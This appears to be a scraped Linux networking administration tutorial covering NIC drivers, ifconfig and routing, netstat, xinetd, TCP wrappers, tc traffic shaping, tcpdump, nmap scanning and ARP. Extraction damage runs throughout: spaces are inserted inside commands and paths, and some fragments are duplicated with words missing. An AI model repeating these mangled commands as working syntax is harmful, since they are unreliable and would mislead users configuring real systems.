This inserts the specified module into the kernel .
/sbin/modprobe 3c59x
This also loads a module into the system kernel .
Modprobe command line options : -r : to unload the module .
/ sbin/modprobe -l \* : list all modules .
/ sbin / modprobe -lt net \* :
List only network modules / sbin / modprobe -t net \* :
Try loading all network modules and see what sticks .
( act of desperation )
This also loads a module into the system kernel .
Modprobe command line options : ifconfig ...
The easy way : Red Hat versions 6.2 and later , ship with Kudzu , a device detection program which runs during system initialization .
( /etc/rc.d/init.d/kudzu)
This can detect a newly installed NIC and load the appropriate driver .
Then use /usr / sbin / netconfig to configure the IP address and network settings .
The configuration will be stored so that it will be utilized upon system boot .
Systems with two NIC cards : Typically two cards are used when connecting to two networks .
In this case the device must be defined using one of three methods :
Use the Red Hat GUI tool /usr / bin / netcfg OR Define network parameters in configuration files :
Define new device in file ( Red Hat / Fedora ) /etc/sysconfig/network-scripts/ifcfg-eth1
( S.u.s.e 9.2 : /etc/sysconfig/network/ifcfg-eth-id-XX:XX:XX:XX:XX ) DEVICE=eth1 BOOTPROTO=static IPADDR=192.168.10.12 NETMASK=255.255.255.0 GATEWAY=XXX.XXX.XXX.XXX
HOSTNAME=node-name.name-of-domain.com DOMAIN=name-of-domain.com
Special routing information may be specified , if necessary , in the file
( Red Hat / Fedora ) : /etc/sysconfig/static-routes
( S.u.s.e . 9.2 : /etc/sysconfig/network/routes )
Example : eth1 net XXX.XXX.XXX.0 netmask 255.255.255.0 gw XXX.XXX.XXX.XXX OR
Define network parameters using Unix command line interface : Define IP address : ifconfig eth0 XXX.XXX.XXX.XXX netmask 255.255.255.0 broadcast XXX.XXX.XXX.255
ifconfig eth1 192.168.10.12 netmask 255.255.255.0 broadcast 192.168.10.255
If necessary , define route with with the route command :
Examples : route add default gw XXX.XXX.XXX.XXX dev eth0 route add - net XXX.XXX.XXX.0 netmask 255.255.255.0 gw XXX.XXX.XXX.XXX dev eth0 Where XXX.XXX.XXX.XXX is the gateway to the internet as defined by your ISP or network operator .
If a mistake is made just repeat the route command substituting " del " in place of " add " .
Configuring your NIC : Speed and Duplex settings :
This is usually not necessary because most ethernet adapters can auto - negotiate link speed and duplex setting .
List NIC speed and configuration : mii-tool
eth0 : negotiated 100 baseTx - FD flow - control , link ok Verbose mode : mii-tool -v eth0 : negotiated 100 baseTx - FD flow - control , link ok product info : Intel 82555 rev 4 basic mode : autonegotiation enabled basic status : autonegotiation complete , link ok capabilities : 100 baseTx - FD 100 baseTx - HD 10 baseT - FD 10 baseT - HD advertising : 100 baseTx - FD 100 baseTx - HD 10 baseT - FD 10 baseT - HD flow - control link partner : 100 baseTx - FD 100 baseTx - HD 10 baseT -FD 10 baseT - HD flow - control
Set NIC configuration : mii-tool -F option
Option Parameters -F 100 baseTx -FD
100 baseTx -HD
10 baseT-FD
10 baseT - HD -A 100 baseT4
100 baseTx -FD
100 baseTx -HD
10 baseT-FD
10 baseT-HD
Man Pages :
mii -tool - view , manipulate media - independent interface status
Query NIC with ethtool :
Command Description ethtool -g eth0 Queries ethernet device for rx /tx ring parameter information .
ethtool - a eth0 Queries ethernet device for pause parameter information .
ethtool -c eth0 Queries ethernet device for coalescing information .
ethtool - i eth0 Queries ethernet device for associated driver information .
ethtool -d eth0 Prints a register dump for the specified ethernet device .
ethtool -k eth0 Queries ethernet device for offload information .
ethtool - S eth0 Queries ethernet device for NIC and driver statistics .
ethtool -p eth0
This command is used to identify the ethernet hardware port associated with the device specified by blinking the LED on the port .
Man Pages :
ethtool - Display or change ethernet card settings
VPN , Tunneling :
Useful Linux networking commands :
/etc/rc.d/init.d/network start - command to start , restart or stop the network
- command to start , restart or stop the network netstat - Display connections , routing tables , stats etc List externally connected processes : netstat - punta -a : Show both listening and non-listening sockets .
-p : Show PID of process owning socket -u : Show UDP -t : Show TCP -n : Show IP addresses only .
Do n't resolve host names - g : Show multi-cast group membership info -c : Continuous mode - update info every second - v : Verbose -e : Extended information -o : show network timer information List all connected processes : netstat - nap List all processes with a TCP connection : netstat - tlnp
This will list open TCP ports : -t : TCP -l : listening ports only -n : no host name lookup - p : process ID one can also use the command : lsof - i - P
Show network statistics : netstat -s Display routing table info : netstat - rn $ netstat - nr Kernel IP routing table Destination Gateway Genmask Flags MSS Window irtt Iface 192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0 0.0.0.0 192.168.1.1 0.0.0.0 UG
0 0 0 eth0 Flags : G : route uses gateway U : Interface is " up " H : Only a single host is accessible ( eg. loopback ) D : Entry generated by ICMP redirect message M : Modified by ICMP redirect message Display processes connecting with ssh ( port 22 ) : netstat - aon | grep ': 22 ' $ netstat - aon | grep :22 tcp 0 0 0.0.0.0:22 0.0.0.0 :* LISTEN off ( 0.00/0/0 ) tcp 0 36 172.131.56.120:22 118.57.17.204:37951 ESTABLISHED on ( 0.24/0/0 ) tcp 0 0 172.131.56.120:22 116.31.114.52:46438 ESTABLISHED
keepalive ( 7160.36/0/0 ) tcp 0 0 172.131.56.120:22 116.31.114.52:64874 ESTABLISHED
keepalive ( 7209.52/0/0 ) tcp 0 0 :::22 :::* LISTEN off ( 0.00/0/0 ) - a : Show both listening and non-listening sockets .
-o : show network timer information -n : no host name lookup Note that a " connection " does not mean that there was a successful login .
Display interface statistics : netstat - i $ netstat - i Kernel Interface table Iface MTU Met RX - OK RX - ERR RX - DRP RX - OVR TX - OK TX - ERR TX - DRP TX - OVR Flg eth0 1500 0 2224 0 0 0 1969 0 0 0 BMRU lo 16436 0 1428 0 0 0 1428 0 0 0 LRU
Where : RX - OK / TX - OK : number of packets transmitted / received error free RX - ERR / TX - ERR : number of damaged / error packets transmitted / received RX - DRP / TX - DRP : number of dropped packets RX - OVR / TX - OVR : number of packets dropped because of a buffer overrun Flags : B : A broadcast address has been set L : This interface is a loopback device M : All packets are received N : Trailers are avoided O : ARP is turned off for this interface P : Point - to - point connection R : Interface is running U : Interface is up
rtstat / lnstat - unified linux network statistics
( reports contents of / proc / net / stat / and routing cache statistics )
( reports contents of and routing cache statistics ) nstat / rtacct - network statistics tools
( monitor kernel snmp counters and network interface statistics )
( monitor kernel snmp counters and network interface statistics ) ping - send ICMP ECHO_REQUEST packets to network hosts .
Use Cntl - C to stop ping .
traceroute - print the route packets take to network host .
( Ubuntu Note : Typically Ubuntu installs tracepath for IP v4 and traceroute6 for IPv6 .
One can install traceroute : apt - get install traceroute ) traceroute IP - address - of - server traceroute domain - name - of - server
( Ubuntu Note : Typically Ubuntu installs for IP v4 and for IPv6 .
One can install traceroute : ) mtr - a network diagnostic tool introduced in Fedora - Like traceroute except it gives more network quality and network diagnostic info .
Leave running to get real time stats .
Reports best and worst round trip times in milliseconds .
mtr IP - address - of - server mtr domain - name - of - server
Example : mtr -- report www.yahoo.com
[ prompt ] $ mtr -- report www.yahoo.com Start : Sun May 22 19:26:58 2016 HOST : mydesktop Loss % Snt Last Avg Best Wrst StDev 1 . |-- Wireless_Broadband_Router
0.0 % 10 0.4 0.4 0.3 0.4 0.0 2 . |-- 61.218.111.1 0.0 % 10 4.3 5.4 3.2 9.4 1.9 3 . |-- 142.202.104.222 0.0 % 10 6.7 7.5 6.1 9.9 0.9 4 . |-- ae8---0.scr02.lsan.ca.fro
0.0 % 10 6.1 7.1 6.1 8.2 0.6 5 . |-- ae1---0.cbr01.lsan.ca.fro
0.0 % 10 7.4 7.7 5.7 16.6 3.1 6 . |-- lag-101.ear2.LosAngeles1 .
80.0 % 10 6.0 9.5 6.0 13.0 4.9 7 . |-- ae-1-51.ear3.Seattle1.Lev 90.0 % 10 32.4 32.4 32.4 32.4 0.0 8 . |-- YAHOO -INC.ear3 .
Seattle1.L 0.0 % 10 34.2 33.1 31.7 35.1 0.9 9 . |-- ae-7.pat1.gqb.yahoo.com
0.0 % 10 36.7 35.9 35.1 36.9 0.3 10 .|-- et-1-0-0.msr2.gq1.yahoo.c
0.0 % 10 37.5 39.3 36.6 57.1 6.2 11.|-- et-1-0-0.clr1-a-gdc.gq1.y
0.0 % 10 37.2 49.1 37.2 119.3 26.0 12.|-- et-18-1.fab7-1-gdc.gq1.ya 0.0 % 10 38.5 38.1 36.9 39.9 0.7 13 .|-- po-15.bas1-7-prd.gq1.yaho
0.0 % 10 38.0 37.4 36.6 38.5 0.0 14 .|-- ir1.fp.vip.gq1.yahoo.com
0.0 % 10 40.5 37.9 36.7 40.5 1.1 Installation packages : Ubuntu : mtr-tiny , RH / CentOS : mtr
Installation packages : Ubuntu : mtr-tiny , RH / CentOS : mtr whois - Lookup a domain name in the internic whois database .
finger - Display information on a system user .
i.e. finger user@host Uses $ HOME /.plan and $ HOME /. project user files .
Uses and user files .
iptables - IP firewall administration ( Linux kernel 2.6/2.4 )
See YoLinux firewall / gateway configuration .
ipchains - IP firewall administration ( older Linux kernel 2.2 ) See YoLinux firewall / gateway configuration .
host - Give a host name and the command will return IP address .
Unlike nslookup , the host command will use both /etc / hosts as well as DNS .
Example : host domain - name - of - server
, the command will use both as well as DNS .
Example : nslookup - Give a host name and the command will return IP address .
Also see Testing your DNS ( YoLinux Tutorial )
Note that nslookup does not use the /etc / hosts file .
inetd / xinetd : Network Socket Listener Daemons :
The network listening daemons listen and respond to all network socket connections made on the TCP / IP ports assigned to it .
The ports are defined by the file / etc / services .
When a connection is made , the listener will attempt to invoke the assigned program and pipe the data to it .
This simplified matters by allowing the assigned program to read from stdin instead of making its own sockets connection .
The listener handles the network socket connection .
Two network listening and management daemons have been used in Red Hat Linux distributions :
inetd : Red Hat 6.x and older
xinetd : Red Hat 7.0- 9.0 , RHEL 5 - 8 , Fedora
inetd :
/etc/inetd.conf
service socket - type protocol wait user server cmdline
Configuration file : Entries in this file consist of a single line made up of the following fields :
service :
The name assigned to the service .
Matches the name given in the file / etc / services
: The name assigned to the service .
Matches the name given in the file socket - type : stream : connection protocols ( TCP ) dgram : datagram protocols ( UDP ) raw rdm seqpacket
: protocol : Transport protocol name which matches a name in the file / etc / protocols .
i.e. udp , icmp , tcp , rpc/udp , rpc/tcp , ip , ipv6
: Transport protocol name which matches a name in the file .
i.e. udp , icmp , tcp , rpc/udp , rpc/tcp , ip , ip v6 wait : Applies only to datagram protocols ( UDP ) . wait [.max ] :
One server for the specified port at any time ( RPC ) nowait [.max ] :
Continue to listen and launch new services if a new connection is made .
( multi- threaded )
Max refers to the maximum number of server instances spawned in 60 seconds .
( default=40 )
Applies only to datagram protocols ( UDP ) .
Max refers to the maximum number of server instances spawned in 60 seconds .
( default=40 ) user [.group ] : login id of the user the process is executed under .
Often nobody , root or a special restricted id for that service .
: login id of the user the process is executed under .
Often nobody , root or a special restricted id for that service .
server :
Full path name of the server program to be executed .
: Full path name of the server program to be executed .
cmdline : Command line to be passed to the server .
This includes argument 0 ( argv [ 0 ] ) , that is the command name .
This field is empty for internal services .
Example of internal TCP services : echo , discard , chargen ( character generator ) , daytime ( human readable time ) , and time ( machine readable time ) .
( see RFC )
Sample File : /etc/inetd.conf
#echo stream tcp nowait root internal #echo dgram udp wait root internal ftp stream tcp nowait root / usr / sbin / tcpd in . ftpd - l - a # pop - 3 stream tcp nowait root /usr / sbin / tcpd ipop3d # swat stream tcp nowait.400 root /usr / sbin / swat swat
A line may be commented out by using a ' # ' as the first character in the line .
This will turn the service off .
The maximum length of a line is 1022 characters .
The inet daemon must be restarted to pick up the changes made to the file :
/etc/rc.d/init.d/inetd restart
For more information see the man pages " inetd " and " inetd.conf " .
xinetd : Extended Internet Services Daemon :
Xinetd has access control mechanisms , logging capabilities , the ability to make services available based on time , and can place limits on the number of servers that can be started , redirect services to different ports and network interfaces ( NIC ) or even to a different server , chroot a service etc ... and thus a worthy upgrade from inetd .
Use the command chkconfig -- list to view all system services and their state .
It will also list all network services controlled by xinetd and their respective state under the title " xinetd based services " .
( Works for xinetd ( RH7.0 + ) but not inetd )
The xinetd network daemon uses PAM also called network wrappers which invoke the /etc/hosts.allow and /etc/hosts .deny files .
Configuration file : /etc/xinetd.conf which in turn uses configuration files found in the directory /etc/ xinetd.d/ .
To turn a network service on or off :
Edit the file
/etc/ xinetd.d/ service - name
Set the disable value :
disable = yes
or
disable = no Restart the xinetd process using the signal : SIGUSR1 ( kill - SIGUSR1 process - id ) -
Soft reconfiguration does not terminate existing connections .
( Important if you are connected remotely ) SIGUSR2 - Hard reconfiguration stops and restarts the xinetd process .
( Note : Using the HUP signal will terminate the process . )
OR
Set the disable value : or Restart the xinetd process using the signal : ( Note : Using the HUP signal will terminate the process . )
Use the chkconfig command : chkconfig service - name on
( or off )
This command will also restart the xinetd process to pick up the new configuration .
The file contains entries of the form :
service service - name { attribute assignment - operator value value ... ... {
attribute : disable : yes no type : RPC INTERNAL : UNLISTED : Not found in /etc/rpc or /etc / services id :
By default the service id is the same as the service name .
socket_type : stream : TCP dgram : UDP raw : Direct IP access seqpacket : service that requires reliable sequential datagram transmission flags : Combination of : REUSE , INTERCEPT , NORETRY , IDONLY , NAMEINARGS , NODELAY , DISABLE , KEEPALIVE , NOLIBWRAP .
See the xinetd man page for details .
protocol : Transport protocol name which matches a name in the file / etc / protocols .
wait : no : multi- threaded yes : single - threaded - One server for the specified port at any time ( RPC ) user :
See file : /etc / passwd group :
See file : /etc /group server : Program to execute and receive data stream from socket .
( Fully qualified name - full path name of program ) server_args : Unlike inetd , arg [ 0 ] or the name of the service is not passed .
only_from : IP address , factorized address , netmask range , hostname or network name from file / etc / networks .
no_access :
Deny from ... ( inverse of only_from ) access_times port :
See file /etc / services Also : log_type , log_on_success , log_on_failure ( Log options : += PID , HOST , USERID , EXIT , DURATION , ATTEMPT and RECORD ) , rpc_version , rpc_number , env , passenv , redirect , bind , interface , banner , banner_success , banner_fail , per_source , cps , max_load , groups , enabled , include , includedir , rlimit_as , rlimit_cpu , rlimit_data , rlimit_rss , rlimit_stack .
The best source of information is the man page and its many examples .
: Also : log_type , log_on_success , log_on_failure ( Log options : += PID , HOST , USERID , EXIT , DURATION , ATTEMPT and RECORD ) , rpc_version , rpc_number , env , passenv , redirect , bind , interface , banner , banner_success , banner_fail , per_source , cps , max_load , groups , enabled , include , includedir , rlimit_as , rlimit_cpu , rlimit_data , rlimit_rss , rlimit_stack .
The best source of information is the man page and its many examples .
assignment - operator : = += : add a value to the set of values -= : delete a value from the set of values
:
Where :
Then restart the daemon : /etc/rc.d/init.d/xinetd restart
Example from man page : Limit telnet sessions to 8 Mbytes of memory and a total 20 CPU seconds for child processes .
service telnet { socket_type = stream wait = no nice = 10 user = root server =
/usr/etc/in.telnetd rlimit_as = 8 M rlimit_cpu = 20 }
[ Pitfall ]
Red Hat 7.1 with updates as of 07/06/2001 required that I restart the xinetd services before FTP would work properly even though xinetd had started without failure during the boot sequence .
I have no explanation as to why this occurs or how to fix it other than to restart xinetd : /etc/rc.d/init.d/xinetd restart .
Man Pages :
For more info see :
Remote commands : rcp , rsh , rlogin , rwho , ...
Most of the original Unix remote commands have been superceded by secure shell equivalents .
Instead of telnet , rsh or rlogin , one should use the encrypted connection ssh .
telnet - user interface to the TELNET protocol
rlogin - remote login
rsh - remote shell to execute a command and return results
uux - Remote command execution over UUCP
rcp - remote file copy
uucp - Unix to Unix copy ( AWS and RHEL EPEL repo )
uuxqt - UUCP execution daemon
uucico - UUCP file transfer daemon
cu - Call up another system ( cu is an old legacy command which is reported to not work very well )
See the YoLinux.com secure shell tutorial for use of ssh , rssh , scp and sftp
RWHO : Remote Who daemon - rwhod
The " rwho " command is used to display users logged into computers on your LAN .
By default , Red Hat Linux has the network interface to the rwhod disabled .
Thus if one issues the command " rwho " , you will only see who is logged into the system you are logged into and not remote systems on the network .
This is a safe approach for internet servers as it reduces the exposure of a service which could be exploited by hackers .
If you wish to use rwhod on a local private and firewall protected network , here is how :
Allow broadcast capabilities .
Edit /etc/init.d/rwhod
change from : daemon rwhod
to : daemon rwhod -b
Start service :
Set service to start with system boot : chkconfig -- level 345 rwhod on
Start rwhod service : service rwhod start
( or : service rwhod restart )
Man pages :
rwho : who is logged in on local network machines
rwhod : system status server
who : show who is logged on to the same system
RPC : Remote Procedure Calls with rpcbind ( current ) / portmapper ( older RHEL5 -)
Rpcbind or portmapper are required to manage RPC ( Remote Procedure Call ) requests from services like NFS ( file sharing services ) , NIS ( Network Information Services ) and SAMBA .
rpcbind is newer and used on RHEL 6,7 / Ubuntu 10.04 , 12.04 , 14.04 and later systems while portmapper was used on RHEL5 or prior systems .
Rpcbind and portmapper are both server based services which manages RPC program number requests and returns universal addresses .
The rpc service tells rpcbind the address on which it is listening and the RPC program numbers it will serve .
Clients first contact rpcbind to lookup where its request should be sent .
An RPC server makes available a collection of procedures ( programs ) that a client system may call and then receive the returned results .
The list of services available is listed in /etc /rpc on the server .
The message communication is in a machine independent form called XDR ( External Data Representation format ) .
rpcbind server : Install service : RHEL6 + : sudo yum install rpcbind Ubuntu : sudo apt - get install rpcbind Start service : /etc / init.d / rpcbind start service rpcbind start ( Red Hat / Fedora )
portmap server : /etc/init.d/ portmap start
service portmap start ( Red Hat / Fedora )
[ root ] # rpcinfo -p localhost
program vers proto port service 100000 4 tcp 111 portmapper 100000 3 tcp 111 portmapper 100000 2 tcp 111 portmapper 100000 4 udp 111 portmapper 100000 3 udp 111 portmapper 100000 2 udp 111 portmapper 100024 1 udp 36133 status 100024 1 tcp 47367 status ... ...
List RPC services supported :
Man Pages :
rpc - Remote Procedure Call
rpcinfo - report RPC information
/ etc/rpc - rpc program number data base
xdr - Remote Procedure Call
rpcbind : rpcbind - port to RPC program number mapper service
portmapper : portmap - DARPA port to RPC program number mapper service pmap_dump - print a list of all registered RPC programs pmap_set - set the list of registered RPC programs
PAM : Network Wrappers :
Pluggable Authentication Modules for Linux ( TCP Wrappers )
This system allows or denies network access .
One can reject or allow specific IP addresses or subnets to access your system .
File : /etc/hosts.allow
in.ftpd:208.188.34.105
.name-of-domain.com
This specifically allows the given IP address to ftp to your system .
One can also specify an entire domain .
i.e. Note the beginning " . " .
File : /etc/hosts.deny
ALL : ALL
This generally denies any access .
See the pam man page .
File : /etc/inetd.conf
ftp stream tcp nowait root /usr / sbin / tcpd in.ftpd -l -a
The inet daemon accepts the incoming network stream and assigns it to the PAM TCP wrapper , /usr / sbin/tcpd , which accepts or denies the network connection as defined by /etc/hosts.allow and /etc/hosts.deny and then passes it along to ftp .
This is logged to / var / log / secure
Advanced PAM : More specific access can be assigned and controlled by controlling the level of authentication required for access .
Files reflect the inet service name .
Rules and modules are stacked to achieve the level of security desired .
See the files in /etc / pam.d/... ( some systems use /etc/ pam.conf )
The format : service type control module - path module - arguments
auth - ( type ) Password is required for the user nullok - Null or non-existent password is acceptable shadow - encrypted passwords kept in /etc / shadow
account - ( type ) Verifies password .
Can track and force password changes .
password - ( type ) Controls password update retry=3 - Sets the number of login attempts minlen=8 - Set minimum length of password
session - ( type ) Controls monitoring
Modules :
/lib/security/pam_pwdb.so - password database module
/lib/security/pam_shells.so -
/lib/security/pam_cracklib.so - checks is password is crackable
/lib/security/pam_listfile.so
After re-configuration , restart the inet daemon : killall - HUP inetd
For more info see :
ICMP :
ICMP is the network protocol used by the ping and traceroute commands .
ICMP redirect packets are sent from the router to the host to inform the host of a better route .
To enable ICMP redirect , add the following line to /etc/sysctl.conf :
net.ipv4.conf.all.accept_redirects = 1
Add the following to the file : /etc/rc.d/rc.local
for f in / proc/sys / net/ipv4/conf/*/accept_redirects do echo 1 > $f done
Command to view Kernel IP routing cache : / sbin/route -Cn
NOTE : This may leave you vulnerable to hackers as attackers may alter your routes .
Blocking ICMP and look invisible to ping :
The following firewall rules will drop ICMP requests .
iptables -A OUTPUT -p icmp -d 0/0 -j DROP
ipchains - A output -p icmp -d 0/0 -j DENY
echo 1 > / proc/sys/net/ipv4/icmp_echo_ignore_all
Iptables : Ipchains : drop all incoming pings : This is sometimes necessary to look invisible to DOS ( Denial Of Service ) attackers who use ping to watch your machine and launch an attack when it 's presence is detected
Traffic Control ( TC ) and TC New Generation ( TCNG ) :
TC :
Ubuntu / Debian : apt - get install iproute
Red Hat / CentOS / Fedora : yum install iproute
The Linux Kernel is capable of controlling bandwidth peaks , traffic prioritization and scheduling and if necessary , dropping excess traffic , all using the traffic control command " tc " to manage a set of queues ( default queue : pfifo_fast ) .
Bandwidth control is called traffic shaping .
This is often done to avoid exceeding the bandwidth when sending traffic to a particular device such as a wireless modem during peak network bursts .
Traffic prioritization includes reordering network packets so that certain traffic is guarenteed to be sent by a given time .
Packet dropping can be performed on ingress and egress packets to achieve a desired bandwidth .
tc class add dev eth1 parent 1:0 classid 1:1 htb rate 4.0 mbit prio 0
Create main class 1:1 with the assigned datarate 4 Mbit/ sec
Create main class 1:1 with the assigned datarate 4 Mbit / sec tc filter add dev eth1 parent 1:0 prio 0 protocol ip u32 match ip dst 192.168.1.20/32 match ip protocol ip 0 xffff flowid 1:10
Create filter assigned to class 1:0 and 1:1
tc - show or manipulate network traffic control settings
tc-cbq - CBQ - Class Based Queueing - contains shaping elements as well as prioritizing capabilities .
tc qdisc ... dev dev ( parent classid | root ) [ handle major : ] cbq [ allot bytes ] avpkt bytes bandwidth rate [ cell bytes ] [ ewma log ] [ mpu bytes ]
tc class ... dev dev parent major : [ minor ] [ classid major : minor ] cbq allot bytes [ bandwidth rate ] [ rate rate ] prio priority [ weight weight ] [ minburst packets ] [ maxburst packets ] [ ewma log ] [ cell bytes ] avpkt bytes [ mpu bytes ] [ bounded isolated ] [ split handle & defmap defmap ] [ estimator interval timeconstant ]
tc-htb - Hierarchy Token Bucket ( simple replacement for CBQ )
tc qdisc ... dev dev ( parent classid | root ) [ handle major : ] htb [ default minor - id ]
tc class ... dev dev parent major : [ minor ] [ classid major : minor ] htb rate rate [ ceil rate ] burst bytes [ cburst bytes ] [ prio priority ]
tc -drr - deficit round robin scheduler - flexible replacement for Stochastic Fairness Queuing
tc qdisc ... add drr [ quantum bytes ]
tc-sfq - Stochastic Fairness Queueing
tc qdisc ... divisor hashtablesize limit packets perturb seconds quan‐tum bytes
tc-hfsc - HFSC - Hierarchical Fair Service Curve 's control
tc qdisc add ... hfsc [ default CLASSID ]
tc class add ... hfsc [ [ rt SC ] [ ls SC ] | [ sc SC ] ] [ ul SC ]
tc -choke - CHOose and KEep scheduler - classless qdisc designed to both identify and penalize flows that monopolize the queue .
CHOKe is a variation of RED , and the configuration is the same as RED
tc qdisc ... choke limit bytes min bytes max bytes avpkt bytes burst packets [ ecn ] [ bandwidth rate ] probability chance
tc-red - Random Early Detection - classless qdisc to drop packets gracefully
tc qdisc ... red limit bytes min bytes max bytes avpkt bytes burst packets [ ecn ] [ bandwidth rate ] probability chance
tc -tbf - tbf - Token Bucket Filter - Traffic shaper to ensure that the configured rate is not exceeded
tc qdisc ... tbf rate rate burst bytes / cell ( latency ms | limit bytes ) [ mpu bytes [ peakrate rate mtu bytes / cell ] ]
tc-pfifo / tc- bfifo -
The pfifo and bfifo qdiscs are low overhead First In , First Out queues .
pfifo - Packet limited First In , First Out queue :
tc qdisc ... add pfifo [ limit packets ] bfifo - Byte limited First In , First Out queue
tc qdisc ... add bfifo [ limit bytes ]
tc -pfifo_fast - default qdisc of each interface - three - band first in , first out queue
tc -stab - Generic size table manipulations
tc qdisc add ... stab [ mtu BYTES ] [ tsize SLOTS ] [ mpu BYTES ] [ overhead BYTES ] [ linklayer TYPE ] ...
TCNG :
Examples : limit data rate to 4
Mbps so that data rate does not exceed the capability of a wireless networking device :
The command is " tc " .
The rest of the man pages describe specific uses of the command .
The goals of tcng are provide a network configuration language .
Tcng takes input from a script to be parsed and actions delegated to lower level components and to eventual kernel module directives .
tcng home page
Install :
Ubuntu / Debian : apt - get install tcng
tcng - Traffic Control New Generation - show or manipulate network traffic control settings
Network Monitoring
Tools :
tcpdump - dump traffic on a network .
See discussion below .
Command line option Description -c Exit after receiving count packets .
- C
Specify size of output dump files .
- i Specify interface if multiple exist .
Lowest used by default .
i.e. eth0 -w file - name Write the raw packets to file rather than parsing and printing them out .
They can later be printed with the -r option .
-n Improve speed by not performing DNS lookups .
Report IP addresses . -t Do n't print a timestamp on each dump line .
Filter expressions : primitive Description host host - name
If host has multiple IP 's , all will be checked .
net network - number Network number .
net network - number mask mask Network number and netmask specified .
port port - number Port number specified .
tcp Sniff TCP packets .
udp Sniff UDP packets .
icmp Sniff icmp packets .
Examples : tcpdump tcp port 80 and host server - 1 tcpdump ip host server - 1 and not server -
2
Filter expressions : iptraf - Interactive Colorful IP LAN Monitor
nmap -
Network exploration tool and security scanner List pingable nodes on network : nmap -sP 192.168.0.0/24
Scans network for IP addresses 192.168.0.0 to 192.168.0.255 using ping .
Wireshark - Network protocol analyzer .
Examine data from a live network .
RPM 's required : wireshark wireshark - gnome Also : gtk+ , glib , glibc , XFree86 - libs -x.x.x-x ( base install )
RPM 's required : EtherApe - Graphical network monitor for Unix modeled after etherman .
This is a great network discovery program with cool graphics .
Gkrellm - Network and system monitor .
Good for monitoring your workstation .
IPTraf - ncurses - based IP LAN monitor .
Cheops - Network discovery , location , diagnosis and management .
Cheops can identify all of the computers that are on your network , their IP address , their DNS name , the operating system they are running .
Cheops can run a port scan on any system on your network .
ntop -
Shows network usage in a way similar to what top does for processes .
Monitors how much data is being sent and received on your network .
MRTG - Multi Router Traffic Grapher - Monitor network traffic load using SNMP and generate an HTML / GIF report .
dnsad - IP traffic capture .
Export to Cisco Netflow for network analysis reporting .
Big Brother - Monitoring ans services availability .
OpenNMS.org - Network Management using SNMP .
Nagios - host , service and network monitoring
Angel network monitor
Using tcpdump to monitor the network :
[ root ] # ifconfig eth0 promisc - Put nic into promiscuous mode to sniff traffic .
[ root ] # tcpdump -n host not XXX.XXX.XXX.XXX | more - Sniff net but ignore IP which is your remote session .
[ root ] # ifconfig eth0 - promisc - Pull nic out of promiscuous mode .
Network Intrusion and Hacker Detection Systems :
SNORT : Monitor the network , performing real - time traffic analysis and packet logging on IP networks for the detection of an attack or probe .
InterSect Alliance - Intrusion analysis .
Identifies malicious or unauthorized access attempts .
ARP : Address Resolution Protocol
Ethernet hosts use the Address Resolution Protocol ( ARP ) to convert a 32 - bit internet IP addresses into a 48 - bit Ethernet MAC address used by network hardware .
( See : RFC 826 ) ARP broadcasts are sent to all hosts on the subnet by the data transmitting host to see who replies .
The broadcast is ignored by all except the intended receiver which recognizes the IP address as its own .
The MAC addresses are remembered ( ARP cache ) for future network communications .
Computers on the subnet typically keep a cache of ARP responses ( typically 20 min but can store permanent information for diskless nodes ) .
ARP broadcasts are passed on by hubs and switches but are blocked by routers .
Reverse ARP ( See : RFC 903 ) is a bootstrap protocol which allows a client to broadcast requesting a server to reply with its IP address .
View ARP tables :
Command / sbin / arp
Shows other systems on your network ( including IP address conflicts ) : /sbin/arp -a Show ARP table Linux style : /sbin/arp -e List ARP table : cat / proc/net/arp
Command / sbin /ip
Shows other systems on your network ( including IP address conflicts ) : / sbin / ip neigh show
Note that the use of a switch instead of a hub will limit your view of other hosts .
Typically all you will see in the arp table is your router or gateway .
Set / Configure ARP tables :
Command / sbin/ arp
Add a host 's IP address : /sbin/arp -s hostname XX:XX:XX:XX:XX :XX pub Delete a host from the table : / sbin / arp -d hostname
This can be used to remove a duplicate IP or force a new interface to provide info .
Command / sbin /ip
Add new ARP entry : ip neigh add 192.168.10.12 lladdr f8:e4:30:38:1c:13 dev eth0 nud perm
( Format : ip neigh add {IP - HERE} lladdr { MAC / LLADDRESS} dev {DEVICE} nud { STATE} )
Where STATE : permanent / perm :
The neighbour entry is valid forever and can be only be removed administratively noarp :
No attempts to validate this entry will be made stale :
The neighbour entry is valid but suspicious reachable :
The neighbour entry is valid until the reachability timeout expires Delete a ARP entry : ip neigh del 192.168.10.15 dev eth0 Flush ARP entry : ip - stats neigh flush 192.168.10.5
Man pages :
ARP is something that simply works .
No Linux system configuration is necessary .
It 's all part of the ethernet and IP protocol .
The aforementioned information is just part of the Linux culture of full visibility into what is going on .
TCP vs UDP :
Transmission Control Protocol ( TCP ) is a network transport Internet Protocol ( IP ) typically used for its bi-directional communications reliability .
TCP is a protocol which first establishes a connection and then transmits data over that connection .
Replies of acknowledgement are sent to each end of the connection to communicate the fact that the transmitted data was valid to determine if the data should be re-sent .
The TCP header is 24 bytes of information including the source and destination port , the packet sequence information , checksum and various flags indicating the purpose of the packet .
TCP is a streaming protocol where a numbered set of packets are sent over the network and available to the system in - order .
This makes TCP appropriate for file transfer and web content delivery .
User Datagram Protocol ( UDP ) is a protocol which supports a single packet of data with no response , verification or acknowledgement .
A checksum is included in the UDP packet header but the protocol does not arrange for retransmission upon error .
It is a faster communications method as it does not require the overhead of a connection , reliability or packet order .
Each packet is independent of the other and typically used for data no larger than the maximum UDP packet size of 64 Kb ( 65507 bytes ) for the 8 byte header and data , but typically much smaller .
IPv4 Packet Headers :
TCP :
Source Port
16 bits
( 0 - 65535 ) Destination Port
16 bits
( 0 - 65535 ) Sequence Number
32 bits
( 0 - 4294967295 ) Increments from 1 , zero to clear .
Acknowledgement Number
32 bits
( 0 - 4294967295 ) Data
Offset Res N
S
C
W
R E
C
E U
R
G A
C
K P
S
H R
S
T S
Y
N F
I
N Window
16 bits Checksum
16 bits Urgent Pointer
( If URG is set )
16 bits Options Padding
SYN : signifies first packet sent when opening a connection
ACK : After SYN packet is sent , ACK is set to 1
RST : Request to reset the connection
FIN : Last packet - transmission done
Flags :
UDP :
Source Port
16 bits
( 0 - 65535 ) Destination Port
16 bits
( 0 - 65535 ) Length
( entire datagram : header and data )
16 bits
( 8 - 65535 ) Checksum
( If not used - all zeros )
16 bits
Configuring Linux For Network Multicast :
Regular network exchanges of data are peer to peer unicast transactions .
